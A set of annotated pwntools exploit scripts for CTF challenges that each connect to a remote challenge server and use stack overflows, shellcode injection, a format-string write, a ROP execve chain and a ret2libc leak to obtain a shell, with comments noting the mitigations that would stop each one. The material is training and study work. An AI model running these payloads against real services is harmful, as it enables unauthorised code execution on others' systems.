play

# Exploit script for the "play" challenge (pwntools, x86-64). This is a fixed
# sequence of network I/O: every send is matched to a prompt of the remote
# program, so statement order is part of the behaviour.
from pwn import *
p = remote("123.60.135.228", 2102)

# Loaded but never referenced below (presumably left over from symbol lookup).
elf = ELF("play")
context(log_level = "debug",arch = "amd64",os = "linux")

# Fixed address the second input jumps to. The name suggests it is the global
# buffer the first prompt reads into; a constant like this is only valid for a
# non-PIE binary whose data addresses do not change between runs.
buf=0x00000000006010A0
shellcode = asm(shellcraft.sh())
# First input: the raw shellcode, stored wherever the program keeps this answer.
p.sendlineafter('I think you must enjoy playing.',shellcode)

# Second input: 0x30 bytes of filler plus 8 (presumably the saved rbp) reach the
# saved return address, which is replaced by `buf`.
# Defensive takeaway: this presumably depends on the memory at `buf` being
# executable and on the second read having no length bound; NX/W^X on data
# segments, a bounded read and a stack canary each break this bug class.
payload=(0x30+8)*b'a'+p64(buf)

p.sendlineafter("Name your favorite game?",payload)

p.interactive()

name4

# Exploit script for the "name4" challenge (pwntools, 32-bit). Network I/O in a
# fixed order against the program's prompts; the order is part of the behaviour.
from pwn import *
p = remote("123.60.135.228",2082)
#p=process('name4')

context(log_level = "debug",arch = "i386",os = "linux")
# Defined but not used below.
start=0x0804869E
# Address returned into by the chain; named after read().
read=0x08048410
# Hard-coded stack address. A fixed value like this can only be correct when the
# target's stack is not randomised (ASLR disabled for the service).
buf=0xff8f8000
shellcode =asm(shellcraft.sh())
payload1=p32(0)
p.sendlineafter('Enter your name:',payload1)
p.sendlineafter('Enter your best friend name:',b'1')

# 0x20 + 4 bytes of filler (the 4 presumably being the saved ebp) reach the saved
# return address. Layout after it, in cdecl order: return into `read`, with `buf`
# as read's own return address and (0, buf, 100) as its arguments -- presumably
# read(0, buf, 100) followed by a jump to `buf`.
# Defensive takeaway: a non-executable stack (NX) and ASLR would each defeat this
# on their own, and a stack canary would catch the overwrite before the return.
payload2=(0x20+4)*b'a'+p32(read)+p32(buf)+p32(0)+p32(buf)+p32(100)
#attach(p)
p.sendlineafter("give you stack overflow:",payload2)
#attach(p)
# What the read() call above receives into `buf`, and therefore what runs next.
p.sendlineafter("byebye",shellcode)


p.interactive()

dog

# Exploit script for the "dog" challenge (pwntools, 32-bit): a single
# return-address overwrite.
from pwn import *
p = remote("123.60.135.228",2084)
#p=process('name4')
context(log_level = "debug",arch = "i386",os = "linux")

# 9 + 4 bytes of filler (the filler size suggests a buffer of about 9 bytes plus
# the saved ebp), then the replacement return address. What lives at 0x0804859B
# is not shown here -- presumably a function in the binary that hands out the
# flag or a shell; the fixed 0x0804xxxx address implies a non-PIE binary.
# Defensive takeaway: a stack canary or PIE would stop this trivially; the root
# cause is a read without a length bound into a small stack buffer.
payload=b'a'*(9+4)+p32(0x0804859B)
p.sendlineafter("This puppy needs to eat a few bones?",payload)

p.interactive()

fish

# Exploit script for the "fish" challenge (pwntools, 32-bit): return into gets()
# and then into system(), sharing one writable global buffer.
from pwn import *
p = remote("123.60.135.228",2149)
#p=process('fish')
context(log_level = "debug",arch = "i386",os = "linux")
# 0x6C + 4 bytes of filler reach the saved return address. Then, as the author's
# note below spells out: return into gets() (0x08048450), whose own return
# address is system() (0x08048480); the buffer 0x0804A080 serves first as gets'
# destination and then as system's argument.
payload=(0x6C+4)*b'a'+p32(0x08048450)+p32(0x08048480)+p32(0x0804A080)+p32(0x0804A080)
# gets sys buf buf
p.sendline(payload)
# The second line is what gets() stores in the buffer and system() later receives.
# Defensive takeaway: gets() has no length bound and should not be used at all
# (fgets with an explicit size instead); PIE/ASLR would also invalidate every
# fixed address above, and a stack canary would catch the overwrite.
p.sendline(b'/bin/sh')
p.interactive()

fmt

# Exploit script for the "fmt" challenge (pwntools): a format-string write.
from pwn import *
p = remote("123.60.135.228",2076)
#p=process('fish')
# Target of the write -- a global in a non-PIE binary (0x0804xxxx range).
n=0x0804A030
# pwntools builds a format string that writes the value 4 to address n, assuming
# the user-controlled string is found at printf argument position 6. That offset
# was presumably determined by probing the target; it cannot be derived from this file.
payload = fmtstr_payload(6, {n : 4})
# Defensive takeaway: the underlying bug is user input passed directly as the
# printf format argument. printf("%s", name) removes it entirely, and
# -Wformat-security plus _FORTIFY_SOURCE flag or block %n-style writes.
p.sendlineafter("What's your name?",payload)
p.interactive()

03ret2syscall_32

# Exploit script for "03ret2syscall_32" (pwntools, 32-bit): a ROP chain that
# issues a syscall directly, so no libc function address is needed.
from pwn import *
a = remote("123.60.135.228",2136)
#a=process('03ret2syscall_32')
# NOTE(review): this assignment is repeated three lines below; the later one wins
# and this line has no effect.
p = (0x208+4)*b'a'
# ROP chain for 32-bit
# pop edx ; ret
# 0x208 bytes of filler plus 4 (presumably the saved ebp) reach the saved return
# address; everything appended afterwards is executed as a chain of gadgets.
p = (0x208+4)*b'a'

# Stage 1: store "/bin", then "//sh", then a zero word at .data, .data+4 and
# .data+8 -- i.e. the NUL-terminated string "/bin//sh" at 0x080ea060 -- using the
# pop edx / pop eax / mov [edx], eax gadgets four bytes at a time.
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea060) # @ .data
p += p32(0x080b8576) # pop eax ; ret
p += b'/bin'
p += p32(0x08054b8b) # mov dword ptr [edx], eax ; ret
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea064) # @ .data + 4
p += p32(0x080b8576) # pop eax ; ret
p += b'//sh'
p += p32(0x08054b8b) # mov dword ptr [edx], eax ; ret
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea068) # @ .data + 8
p += p32(0x080494b3) # xor eax, eax ; ret
p += p32(0x08054b8b) # mov dword ptr [edx], eax ; ret
# Stage 2: ebx -> the string, ecx and edx -> the zero word at .data+8 (the second
# and third syscall arguments are thus null pointers).
p += p32(0x080481c9) # pop ebx ; ret
p += p32(0x080ea060) # @ .data
p += p32(0x080ded85) # pop ecx ; ret
p += p32(0x080ea068) # @ .data + 8
p += p32(0x0806f22a) # pop edx ; ret
p += p32(0x080ea068) # @ .data + 8
# Stage 3: eax = 0, then incremented eleven times (11 is the i386 execve syscall
# number), then the software interrupt that performs the call.
p += p32(0x080494b3) # xor eax, eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0807ac0f) # inc eax ; ret
p += p32(0x0806cea3) # int 0x80

# Defensive takeaway: the abundance of fixed gadget addresses suggests a
# statically linked, non-PIE binary. NX alone does not stop ROP; PIE/ASLR, a stack
# canary and a seccomp policy on execve each would break this chain.
a.sendlineafter("Good Luck.",p)
a.interactive()

sleep

# Exploit script for the "sleep" challenge (pwntools, x86-64): three rounds
# through main -- leak a libc address, stage a string, call system(). Each send
# is matched to the program's prompt, so statement order is part of the behaviour.
from pwn import *
from LibcSearcher import *
p = remote("123.60.135.228",2082)
#p= process('./sleep')
context.log_level="debug"
elf=ELF("sleep")
# 0x400xxx addresses: non-PIE binary, fixed across runs.
main_addr = 0x0000000004006BD
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
gets_plt = 0x000000000400550
pop_rdi_ret=0x0000000000400783

# Round 1 (leak): 0x70 + 8 bytes of filler to the saved return address, then
# puts(puts_got) -- prints the resolved libc address of puts -- and return to main
# so the program accepts another input.
payload =b'a' * (0x70+8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt)+p64(main_addr)
#attach(p)
p.sendlineafter("Please cherish every second of sleeping time !!!",payload)
#p.interactive()
# Read up to the 0x7f byte that ends a typical x86-64 libc address, keep the last
# six bytes and zero-extend to eight. Fragile if the program's own output happens
# to contain an earlier 0x7f byte.
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

# Identify the remote libc build from the leaked puts offset. LibcSearcher is a
# third-party offline database lookup; it can return several candidates and may
# need the right one selected interactively.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
# Writable global used to hold the string for system().
binsh_addr = 0x0000000000601040
# A lone `ret` gadget, presumably inserted to keep the stack 16-byte aligned before
# calling into libc (the usual movaps crash otherwise) -- TODO confirm.
ret_addr = 0x0000000000400501
#attach(p)
# Round 2 (stage the string): gets(0x601040), then back to main.
# NOTE(review): the literal 0x000000000601040 duplicates binsh_addr; using the
# named constant would keep the two rounds from drifting apart.
payload2 = b'a' * (0x70+8) +p64(ret_addr)+p64(pop_rdi_ret) + p64(0x000000000601040)+p64(gets_plt)+p64(ret_addr)+p64(main_addr)

p.sendlineafter("Please cherish every second of sleeping time !!!",payload2)
# Time-based sync before feeding gets(); waiting on received output would be more
# robust than a fixed delay.
sleep(2)
p.sendline(b'/bin/sh\0')



# Round 3: system(binsh_addr).
# Defensive takeaway: the leak exists because GOT entries are readable through
# puts and the overflow has no bound. A stack canary stops all three rounds, and
# PIE plus ASLR removes the fixed PLT/gadget addresses the chain relies on.
payload2 = b'a' * (0x70+8) +p64(ret_addr)+p64(pop_rdi_ret) + p64(binsh_addr)+p64(system_addr)
p.sendlineafter("Please cherish every second of sleeping time !!!",payload2)
p.interactive()